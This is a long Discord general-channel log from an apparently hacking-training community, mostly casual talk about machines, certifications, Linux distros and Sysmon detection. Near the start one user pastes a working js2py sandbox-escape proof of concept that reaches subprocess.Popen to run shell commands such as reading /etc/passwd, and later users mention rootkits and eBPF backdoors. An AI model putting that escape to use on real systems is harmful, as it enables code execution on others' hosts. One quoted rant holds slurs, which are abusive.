#general
1 messages Β· Page 438 of 1

Warhammer 
good morning y'all
can i get the working code for code part two machine
Isn't it retired?
Like literally you can see the writeup
Or it retires in 2 days
I think
but the code dosen't work
Mmm
could you please help with that
nope
That's the first problem
You need to understand what is the attack vector and why does it happen
You can copy paste payloads and get the flag but that is worthless
import js2py
from sys import version
payload = """
// [+] command goes here:
let cmd = "head -n 1 /etc/passwd; calc; gnome-calculator; kcalc; "
let hacked, bymarve, n11
let getattr, obj
hacked = Object.getOwnPropertyNames({})
bymarve = hacked.getattribute
n11 = bymarve("getattribute")
obj = n11("class").base
getattr = obj.getattribute
function findpopen(o) {
let result;
for(let i in o.subclasses()) {
let item = o.subclasses()[i]
if(item.module == "subprocess" && item.name == "Popen") {
return item
}
if(item.name != "type" && (result = findpopen(item))) {
return result
}
}
}
n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
console.log(n11)
n11
"""
def test_poc():
etcpassword_piece = "rootβ0:0"
result = ""
try:
result = repr(js2py.eval_js(payload))
except Exception:
return False
return etcpassword_piece in result
def main():
if test_poc():
print("Success! the vulnerability exists for python " + repr(version))
else:
print("Failed for python " + repr(version))
if name == "main":
main()
Vro
yes
alr
holyshit copilot is so insanely schizophrenic
Clankers tend to make more code than necessary and change you codebase without asking or being told to
I like to use clankers sometimes but this technology is dumb
Improves a bit if you set them rules
Please
Wsp
Wsp
alright im done now
heeeell yeah
Idk if I can "set rules" for trying to learn ebpfs in linux
Y'all being nasty
Just a little you know we just woke up in EU
Sometimes you just wanna jump off a giraffe
Exactly
I turned in my exam
I'm probably just gonna head to bed
Fingers crossed π€
I've been working on it since noon today so.. 14 hours?
if you dont pass you are dead to us
but blue team
This was just to goof off and learn somethin
I really don't wanna look at cases in elastic. I already know that there's like 8 Palo Alto IPs scanning our shit 
heya cealdo
If I never have to use elastic or splunk again it'll be too soon
I am now deadly with both of them and I hate everything
finished up your exam cloud?
Yeah
congrats π now the waiting game begins
Lmao try setting elastic stack up, it's awful
No thanks
Not much, how about you? I'm learning about eBpfs in Linux
im ok π
I think I'm about to bust out the classic chips and peanut butter as a treat
All I know is they're like kernel modules but more restricted and on a VM in the kernel
That's good
Fun fact, kubernetes app armor uses them
my mind when I hear BPF or anything remotely close goes to: Berkeley Packet Filters
BPF big pizza friday
I could really go for Domino's right now 
@undone fossil
morning
Hustler mindset π«‘
uh, I think it depends on the seller and the country you are in
memento mori
sup echo
why?
I have designed automated pipelines with mcps and rules so I can gigaiberturbo vibe code, the clanker works following my coding guidelines and constantly runs the strict eslint rules so I just do 45 min of code review during my work shift
my boss is super happy with the results and the code is not bad since I make sure it is good enough
ebpfs are the extended version of that
idk if I like them anymore
I can't get a proper hack workin for reading files that other users own
we are ahead of the schedule
my old rootkit is supposedly very unsafe according to chatgpt 
literally he gives me work to do that is just like remaking the companies website or some stupid stuff
which is already done
I just upload the commits strategically to make it look like I am working hard
lol!
yeah
hopefully he doesnt read this chat then
yeah
how you doing these days?
I am okay π just a tad busy with work and trying to stay mentally healthy
TDD helps a lot with mental health
yeah
xd
TDD?
Test Driven Development
a program that runs your program to see if it does what is supposed to do
before you even code it
Yeah... I hate writing tests 
I love it
once I wrote 3000 tests by hand before AI
after that I started to love it
frees you up from testing most of the time
reliability is king
time to hack giveback π’
I have a meet soon
too bad I can't automatize that yet
Or can you? 
I think I could but if they realize is gg
xd
hi guys
i need help
It's been trying to turn on for 5 minutes.
Does anyone know if the VPN is working?
try a full refresh
i did it
how bout swapping VPNs? region & protocol?
ight, ebpfs suck they'd be neat for a backdoor tho def next project
I'll just fix my rootkit to be stable I guess
Imma use kretprobes so I can return values from my probes to stop other function calls

oh you beat me
Hehehehehe
damn u
goes hard...
Nevermind you can't, I have to use a proper hook
It shouldn't be that bad anymore since I know now to switch writing system calls on and switching it back to read

cohfefe
still awake type beat
Hii guys!
Solving snoopy machine on HTB.
What am I missing Abt previlege escalation with git apply ?
I keep thinking in terms of bypassing permission but I feel that framing is wrong
#boxes is a better place to ask.
and if you wanna chat with @austere sigil then just stay here
still mad at him for that warn π
or with @austere sinew
thanks for the ping sir I had to sprint through obstacles to get here.
nice
would you like an apple?
yes please
model: pink lady from 2026
UwU.

bro is acting like an unc
Hi
hiyo
i'm uncle coffee
I'll take one
I am looking for some people to Join my CTF team

good luck
Thanks
You're trying to bring Deus Ex upon us?
deus frosto
WHEN u teach me

Frosto ex machina
Yeah, nothing's bad going to happen
I will need to hack into some of these nutjobs brains and install better kernels
we are doomed
I'm cooking big fat steak today
Iβm still eating my diet food
pizza?
cucumber π€£
Is my main sources
Plex bug almost done 
Theyβre working on a fix
Last person they gave money, 4x life time vouchers and merch
time for gym

Plex?
nah, chemical company
I reported an RCE for plex
plex media server?
Plex client
Iβve never used plex
I just asked ChatGPT for a good target
And then downloaded, poked and got RCE

cool
How do the HTB admins decide which machines to retire?
they roll a dice
No serious answer?
There's like x active machines
And oldest one gets retired
Whenever new one gets released
Look at you
Pretty sure itβs age
So they dont factor in number of user/root owns? Just a little confused why imagery got retired but expressway is still up
A medium box release retires the oldest medium box release
@exotic pendant question
if youre having skill issues setting up some app to test a bug, is implementing the exact same logic in your own app and running a POC against it counted?
Oh ok so its like 4 like
wdym?
Iβve separated it before and fuzzed yeah
Just make sure at the end you got reachability to the code when hitting for real
Dont worry mate, thx 4 answering my question guys
So ye I isolate functions to test sometimes
Sounds cool
Found one like this, but I couldn't setup the vuln component for some random reason
I copy pasted the vuln file into my POC and asan showed the crash
Prob some other conditions somewhere else in the code
thats above your paygrade son
Hey!!
Hello!!
hola
hola
Aye itβs Friday
this time for real 
Apparently you can execute C code in Claude now
cool feature
Hy
Found a critical API Endpoint in my company, I do not work with Cybersecurity // Developer team but I interact with customers a lot "approximately 250 customers / day", and they offered me a job in Dev Team, haven't heard anything for 11 days, I think this is what the interviews looks like.
Savant syndrome


this isnt anything useful i just got bored
use it, or don't
vro you vibecoded that on a windows machine
lol what?
chatgpt is a bad liar
ask him if he remember anything from previous chats in new chats , says no
mentions things from older chat anyone
mf anytime i ask about something in pentesting he mention HTB , i only mentions HTB once in like 4 months
i even mentioned THM but he always just bring HTB
free u bro
no time for this shit gotta lock in
that's crazy
@supple plume are you saying it's vibecoded because of the optimized: line π
that's there because it was fucking crashing with how i handled json origianlly ππππππππππππ
I mean only the clankers comment a function like this
but I guess you wanted to write that comment
so I know that function called generate that could be called generateKey means generate key
no it was just named something diff beforehand π
but ur right, i vibecoded a 150 line key generator that just mangles shit together after an API call π π π π π π π π π π π π
// Main worker function π£οΈ
it's ok you did most than all these other yappers around here
i didnt actually vibecode it
i do vibecode python tho. bcos fuck python
i spent 3 hours researching how to optimise it
that's what matters
so the vibecode accusation broke me π₯
vro stop giving fucks about what a certified yapper says here
look at my profile
rs
for a builder exe
i mean i could write that in go but im not that familiar with windows specific golang
so, now that I look at it, it is just an api call and a little script to wrap it and configure it
that's what i said
the thing that took a minute was figuring out how to avoid using %
but why c
is it required for the buidler?
I have no idea btw
I try to stay away from windows
I got a letsdefend thing
no not really i could use any lang im just most familiar with that for maldev, besides ASM
and i'd rather do that than gpt paste "how do i write this builder in go"
what is it
Blue Team training platform
I got a voucher for it
cool
htb acquired that thing recently
I thought about gettin a sub I think there is cool content there but I already have a lot on my plate with htb
I know Hades
letβs defend? Nah letβs attack!!
Sometimes the best offense is a good defense
oh hey
hetty?

u typo rght?π
yes
np bro, it's normal human error
I held a plank position for 7 minutes today
dayum
maybe time we add weight πͺ
Yeah
Wait
Arent lets Defender and htb working together
So u have access to their stuff as well
?
Pretty sure i read smth like "one account, two platforms"
Now do crunches with 50kgs in plates

Is anyone else sort of fatigued by security practices?
I am honestly done with being all security conscious online. I don't wanna update my OS anymore, and I wanna download random.exe files from the internet and run them. Like fuck security bro it's so annoying
Plugging your ears doesn't change the problem
@lunar elm hi
hi Bob
Kabob!
you gotta pay for their vip+ sub
Kaboom
ok, Ill call you Kabob
anyway, why are you named that, is it a country specific name or something else?
Im asking cuz I didnt see the name before
kabob goes hard ngl
Hii all!!
hi
I'm new here. Can you explain what you discuss here?
anyone know where model settings are in lm studio's new UI? cant find them or docs telling where they are
@signal mica bad kitty
naughty!
are you single?
Heβs mine
help me anakin
hopefully have some components coming today
He's a crab. He''s a single server meal
planning on finishing my CYD marauder project if my mailbox can get busted open
hbu @zealous charm any sick hacks today?
I saw debugger output yesterday somewhere
looked like you were doing something interesting π
I'm marriedd to life, cause it's good
Yeah still dorking around with this heap overflow. I have RIP and RAX control but thatβs where Iβm stuck
you about to get rizzed by the rizzler
what does that mean
God I feel like we had great childhood movies
oh shit dawg really? you just need control over DEP and a pop rax; retn; gadget
The road to El Dorado was wildly beautiful

I was messing around with ropper yesterday to find gadgets. Iβm confident I could make this work on my machine, but I want it to work between boot sessions
The animation was so good back then. Wild what we get now strictly for budget cuts 
meeting rn bbiaf
I don't know, I'm just throwing random brainrot answers out there cause I'm over worked and exhausted. Staring at that clock trying to will it to go faster 
oh
you look so lonly
i can't fix that
Ma'am, that's gonna be a no. This is my zen zone.
But feel free to shit post with me. Spread the brainrot, in a respecful way.
can someone translate
π
Try not to overthink it.
I'm sure you did great.
Plus you still get a second attempt. Trust me if you don't get it the first time you'll get it the second. That's what happened to me with the CBBH when I took it.
goodness
he won't need a second attempt
my prediction lol
I don't believe I will, no
This would be something I'd be proud to turn in for my real life job
Infact, it's probably more difficult than any single case I've ever done
Oh, I misunderstood, you're just exhausted from it.
My bad
oh wow
I'm trying to describe it
As vaguely as possible
But uh
What my job lets me comfortably handle with teams of people working in harmony
I have to do alone, twice π
Which is why it took me from.. last Saturday until last night 
Clouds a one man SOC. It's not AI you have to worry about taking your job it's Cloud. 
Rudo coming out swinging. 
I promise you the whole time I was working on my exam I kept thinking
God I miss my coworkers

"hey can you check out this host?"
"Sure thing dude!"

None of that
It's me, I'm asking myself for help
I require my highly experienced Australian friends to carry me thanks
breaks a vase
Azo I finished
man i wanna do that path so bad but i dont have the timeeee
also why have you even done it
isnt that like your job anyways
I wanted to be better at my job
so you have learned new things
I have!
neat
Although if I see process injection or hollowing again I'm gonna throw up
stop doing this to me
CreateRemoteThread azo
it feels like i have no cigarettes and you are livestreaming me a smoking facetime
Thatβs pretty easy to detect no?
hello general chat , how do i experience time in polynomial matter, thanks in advance
And if you have no detections available? 
But also yeah it's a sysmon event
Isnβt that a scammers GitHub
elaborate
So there was this one dude in this server that kept shitting out buzz words called samaltman
Yessir
It was all ai coded and described slop
But was offering paid services for anyone who wanted to use his (paid software)
ahh i remember now
CREATE_SUSPENDED_PROCESS flag should ideally give you what you need
Sysmon is more readily available than whatever that flag is sourced from
caught yo ass listening to kendrick
yeah kendrick is cool
In any case, just for clarity's sake what sysmon event do I need to look out for?
Event code 8
CreateRemoteThread is event code 8
take care mina san
Event code 10 is ProcessAccess, which you'll see in stuff like memory access for LSASS dumping
I was talking about Process Hollowing as well
It'll have a correlating Event Code 1, ProcessCreate
Most tools call the process they want to hollow
Or inject
Awesome thanks
The elastic and splunk threat hunting modules are good for practicing this
Oh and
I don't know if it's ever like
Directly stated
But computers perform operations really, really fast when not told to pause
So it's actually normal to see things occuring within the same second as one another
hello
There's variances of executions speeds depending on a shitload of factors but ultimately
Computers are quick and can do things very quickly
@molten bobcat Hey, have you ever done the SOC/Threat Hunting simulator on THM? I'm curious to know if it's any good.
Does anyone know a Linux distro that doesn't completely suck? I dualboot bc I have some mandatory stuff running on Linux and it always fucking breaks.
mint
is CBBH deactivated? I cant see it on htb website
Itβs CWES now
@austere sinew confirms it
CONFIRMS WHAT
That cbbh was renamed
ohhh
wait i need to stop procrastinating i need to do boxes otherwise a certain individual will kill me
this would be ideal but he has terrified me today

Who?
I haven't done boxes in months
And honestly nothing related to Cyber security or IT lol
π
It utterly disgusts me
i refuse to say on the grounds that i will die
I will protect you
Seasonal machines
Gives enough motivation to finish them in a week
Atleast RA used to give
This damn leg day
I really like Pop OS. It's solid, and I've been running it since like setptember. I feel like my vmware workstations software actually runs better on it
What breaks? And what distro are you on?
I kind doubt it's the distro that is the issue but idk 
It also has it's own windows management system too. Not sure about the "cosmic desktop" they're switching over to at some point. Also has it's own software store GUI as well as you can manage through apt.
It's just I Don't wanna keep doing shit for the OS to work lol
So what's the distro?
Fedora
Meow I get it
I mean im #1 fedora hater but it's pretty stable from what I know
I dont think switching distro will resolve ur issues (whatever they are) but yeah
Pop OS also has strong nvidia support right out of the box. I haven't had to tune anything except for steam
Switching distros won't I need to switch OS's but first I need to recompile all port my projects for windows
Yeah I heard
@zealous charm One man's dream can hold dominion over the entire world for one who dedicates his life to the forging of a single sword. While many can pursue their dreams in solitude, other dreams are like great storms blowing hundreds, even thousands of dreams apart in their wake. Men live and die by their dreams. But long after they have been abandoned they still smolder deep in men's hearts. Some see nothing more than life and death. They are dead, for they have no dreams.
If you want a linux distro that "just works" out of the box I can vouch for it. It's nothing special but it's quite stable. I dual boot so I can still run certain games under windows, but I spend most of my time in Pop as far as productivity goes.
Lmaoo
Yeah I've been on Linux for 8 years now and I recently got a taste of windows for a week after years of not using... Yeah Linux is not beating that anytime soon
Did u debloat Windows smh?
Didn't come with much to begin with. I got a pro key, and figured I'd have to go through some crapware removal but it was very minimal. W11 is just shite in resource management. I run 20% of my ram in W11 idle. On Pop I'm at lik 3-4%. Underload I don't really go past 50 unless I'm running 2-3 vms at once.
I see, ill be switchint to a pc soon and id love to get rid of some useless shit like the copilot integration or whatever microslop came up with
Yeah, they just keep cramming it with things they think we want. I used to really like windows back in 10. After the upgrade I was getting used to W11, and then I heard the snapshot drama and the copilot bloat and was like guess it's time to really test linux.
We use wins at woek at sometimes stickynotes decides to eat 90% of the memory and almost crash the pc

Steer clear from Dell if you can! lol The desktops I manage at my job, the Dells, run at like 90% RAM consistently with W11. 
Well, guess what we have here LOL
Well if you found any tips to bring that number down please let me know.
Sometimes if I perform the Dell proprietary support update software it helps, but otherwise I think upgrades are in order. For my workstations at least. lol
It also doesn't help most of my staff keep 10+ chrome tabs open. 
Well, guess what? Memory is stuck at exactly 90%
This is crazy
We are forced to use edge 
That's awful
. I can't stand edge lol. How do you like it, since you're forced to use it? Any good feedback on it? 
No, I hate it honestly
Its awfully Microsoft slopped
Who tf uses bing? And the copilot addon?
Probably psycho paths lol 
One of my students almost just caused a fire with a chromebook charger. 
Microslop
I think mostly boomers do, or jocks and other illiterates
How did it go?
I really dont like the interface and lutris in general i think bazzite and steamos are better and that pop is outdated now
You want that dxvk layer which popos doesnt have
Bazzite comes with steam, proton, proton+, lutris and protontricks preinstalled. lol Does have support for latest nvidia drivers too. Also it looks like gnome as well. I'm not saying it's worse or better. Just looks like the same thing. Probably better optimized cause the cosmic desktop seems little overkill
Do you know what dxvk is
Nah, but I can look it up. Give me a second
One of the things steamos is pioneering is a translation layer between directx and vulkan
That is present in bazzite and enables faster framerates compared to running stuff in wine
Thats really the secret sauce that is making windows games run faster in linux
You want that
I don't use wine though. Yeah no this looks like it would save me time in tuning on pop os if I ever decided to switch to a linux gaming solely
I dual boot though
Thats fair
I found pop cause I wanted something more geared towards productivity
Just to have something stable
I have seen bazzite perform wonderfully for gaming though and have heard nothing but great things
I am more of the opinion that I'd rather have two different devices rather than trying to have one do everything machine
So I would sooner have a computer that I do work on and then another computer or steam deck for gaming
That's just me though
I know that bazzite sounds like some literal who os , but I really do think it's good
If I didn't have intel based hardware I would venture out more, but I feel nvidia is really limited when it comes to getting full performance from a linux based system.
What do you run as your daily driver? I'm curious. Just more so for productivity and regular computer work rather than gaming. @vivid flower
I use this
you'll have to forgive my lack of knowledge, but what is coreboot? I'm looking it up and seeing its and open source BIOS/UEFI, but is it also an OS?
Debian recently made a big change, now /tmp/ is mounted to ram and not all kali tools are updated to use /tmp/ responsibly. So if you dont have a lot of RAM or swap space freezes are more common now. My lappy has 16gb of ram and i gave myself 64gb of swap space because i was tired of dealing with it
Coreboot is a very tiny linux distribution (kind of like VTL) that is an open source pre-boot environment replacement
So its both. It can be used to load an open source BIOS like SeaBIOS or tinycore
Maybe RAM issue? Probably windows in sucking resources to get out of iddle state and that affect your VM?
the vm works i can interact with it but i closed my laptop lid for like 10 mins and then kali is stuck i cant do anything i gotta restart my progress
@austere sinew
Im not sure about the vm but i would try giving it more RAM and see if it helps
Got it, because I was looking at it and thinking doesn't it still need an OS to run on top of it?
It's something I would consider putting on my old y50-70 just to give it a shot. It's supposed to focus on boot time, security, and be really lightweight. Which i'm all for. lol
Oh yeah it boots so fast
You can gain a lot of boot speed with libreboot and a solid state drive. In which I compare the boot time of my normal t420 and by librebooted x200 with an SDD.
Oh and don't tell me that Ubuntu had a fast boot five years ago! That was five years ago!
With pop os I get a little nervous sometimes I get a black screen that varies display time when initially booting. 
So do you run any linux distros on the devices you have? Like mint, or arch, etc.?
I daily drive kali bare metal and run kali inside of a vm inside of kali 
I can understand that.
I never took to it. After I tried kali it just seemed redundant to try parrot as it looked much like Kali already.
Custom or just tools you've aggregated that you like?
Ghostwriter mostly
But there are also little things like i cant enable compatibility with old ciphers easily on parrot
But on kali you can just use kali-tweaks to do that
And afaik parrot doesnt have powershell and kali does
I need that for writing .kirbi tickets
I thought it did, but that might have just been the parrot machine that HTB had custom
Parrot does like 80% of the things i need it to do and its okay for learning and its okay for pwnbox and a lot of htb use case but kali is just the more mature ecosystem
So it sounds like Kali for more professional environments and parrot to learn. At least that's what I'm getting from what you're saying.
Maybe im wrong about powershell i couldnt find it the last time i had parrot installed
Yes, i think so.
If you need to use some obscure tool that is only in AUR then blackarch could be useful
Once I revert to an egg I must bury myself underground for three years. There my form matures.
I haven't run into that yet
I gotta do some laundry and clean up the house
I do miss running tewisay-git on arch distros
I feel like if I'm going to use something like black arch I might as well just make an arch machine from scratch and install everything I want
I like pacman though
Yo! @molten bobcat how did your exam go
π
how do i see command history
The history command
history
history
bro..
none of the commands or anyhting i just did are in history
thats so annoying
no everythings there except for the commands i was using before it crashed
Iirc history doesnt index commands until u close terminal
lol
Well
You didn't say your host crashed now did you
it didnt crash idk what happened
it just
kali just froze so i had to close and reopen
Floppa
Yeah I think you restarting a frozen machine isn't gonna have your shit saved lmao
thats annoying now i forget how i was doing the lab
@molten bobcat when getting CDSA results back?
This is why you have notes on the side
Site says 20 business days or less
Good luck, I hope you get it
Thank ya 
Buy me nitro as a gift once you do it
π
yea
ig u were right
sigh
You passed dude
A frog of the corn?
Cdsa was hard for me bc i hadnt ever really done an investigation where i had to organically discover everything without an initial suggestion on where to start
The training material really doesnt ever really get you to that point
i did the openvpn command it keeps saying restart pause, 2 seconds
Hope you passed as well
this would not happened if you take notes
gl
why are you smoking corn?
He ran out of the green and switched to yellow
im getting lit rn
he is tone down
Well he went from a cool color to a hot one so I'd say he toned up.

I'm just being a ball buster tho lol
Its fine i wont get in to temperature color
you win
probing the net also got me lit ncp
Gonna be me right after I get out of work. 

BUT
I have no twin sister... I think you are confusing me with Barbara
amazing
Did you find everything
now just waiting results ig?
FK You. That was really well played. I actually just loled 
She send regards, she also said you can call her Barbie
Yessir

Gifs you can hear
fr lmao

what do now
Gin
CLOUD
I REALLY can't rn
Dang
maybe weekend yeah
I work this weekend rip
I need to finish webapp for 3pm tmrw 

bro what??
You can tell her Ken is planning his days off and has her in his thoughts.
lmao
Oh I knew about this
I will Kern!!
I mean Ken
I took an astronomy course in college
It have to be cool
I also played a lot of Elite Dangerous lol
Maybe if you got rid of that yee yee ass hair cut, you'll get some bitches on your dick
Better yet, maybe Tanisha will call your dog ass if she ever stop fucking with that brain surgeon or lawyer she fuckin with [N word stretched for 6 syllables]
I collected/sold nav data
Hopefully this doesn't get me banned or muted
π
Botmon
botmon it is
How is Cachy OS going for you
solid
Good to hear that
everything I need and want works
I played a few CS2 games, it went well somehow
Good to hear that
Same for me with Arch
Using LibreOffice is kind of a weird experience tbh
Will check it out
looks exactly like Office
You have batman pfp
Pls tell me you've played all Batman Arkham games
That's exactly the reason
wtf?
incredible games for sure
Arkham Knight, even 11 years later, still one of the best games to ever exist
totally agree
It feels like a movie
@silver forge
nvm you sent this
it's dark as it should be
yes.
yes.
yes.
yes.
yes.
stop
no?
yes.
mods, I have nothing to do with the mayhem this time 
understood.
Which platform? The lab platform, academy, etc.?
Click you're little icon in the top right hand corner, and select billing. After that you can scroll all the way down to update and change your payment method etc.
It took me using
Some needle nose pliers
But I finally got the annoying tag out of my hoodie
just burn it lol
I've never once tried or seen anyone do that
So I'd be pretty clumsy at it lmao
I'd end up with a burnt up hoodie
Are we talking about the same? like the tags from shirts and stuff no? behind the neck?
He wants you to become the human torch.
Yeah
I burn them
Lol i burn a lot of things
No I mean for real, like the threads from jerseys
I know lol
xD
It's one of those "things I've heard/read about, but have never first hand experienced it"
Is also very efective for plastic in general
when you need to "cut" annoying plastic
Ye
Just uh
Do so in an open space?

Idk how much you like huffing plastic fumes
I guess Ive been a chef for so long xD
yes, burning plastic in the backyard in a pit 

Lol one thing is to slightly use fire to make it soft and break it and another one is to make a fire out of plastic
Burning plastic bad for you/the environment
what about polyester and nylon?
I may not be gods greenest little gremlin but I for sure believe in "sumthin" being better than "nothin"
or dead zombies 
don't matter, they burn
yes.
It's the lich king
Someone have been burning corn today also....
πΏ β
Same
I've been hacking too much today
Untrue
about 13-14 hours
a
Bind request failed
What book would you buy for any amount if it existed?
How to make money π
the book of souls
Death Note π
Get a job
I am the name of the book
I was referring to the book π€¦
Like in the format 'how to do ___ without (painpoint) in __ time.
Me too
Well played π
@molten bobcat scale 1 to 10 how schizo have you been in the past 2 weeks
pleas
Pleas 
Everytime I walk past my cpts cert in my room i get an urge to come back to hacking
but that life was so hard ;c
i may come back after some bootcamp im goin through for backend dev
It doesnt have to be, you can always do it just for a hobby
I didn't know ntlm was the problem
you could be right π
no more writing reports, no more garbage talking with customers
just play the game
I'll see what I can do how i could fit it in, you know it's like an itch, kinda like how one plays an mmo for some time idk
The labs are awaiting you π
Mahoraga
Wdym was
Or could bb
For fun, there is a chance to make some bonus money
Unrealistic expectations
burn yourself out, make 0 money
Vro what
Bro
@frail turtle
Don't get in a bootcamp
I been in it a week and a half now
it's okay it's only 25$ a month
Oh ok
not some thousands dollars thing
Usually these scams are like 2k a month
Yeah
Great
Although you don't need a bootcamp
Why
yeah ik i just wanted some structure because I don't know a lot of things
Aright that's not a bad approach
Do they teach you a certain language?
plenty of people here are also very skilled. which the majority of us are not
various; typescript python are the biggest it's boot.dev
C too
These are the good ones
This is useless for web dev
cpts is more difficult than oscp, hallicon for sure has a good base to say the least
he wanted to have fun tho xD
lol my most used weapons are ligolo and burpsuite I can't deny it π
Ooh did you get to make the astroid game yet? That one was fun
no not yet im in the process of re-learning git
Noice. I learned a lot, and the structure is really fun, imo. I'm currently on Functional Programming.
How'd you get it for 25? I'm paying the full 50. 
well 49
Oh you were talking to them mb @frail turtle
theres a promo code that was active right now i think
Good looks. Imma see if I can get another month for 25. Thanks man! 
When i did it they only had backend in Go lol
@lilac cipher @austere sinew @frosty thistle
@supple plume @mystic harbor @gray wraith
Hi

@muted olive
@worn drift
@unreal sky
Hi

Yeah, I pulled that trigger. That's a lot off for how much you'd pay in a year for the monly payment.







π½

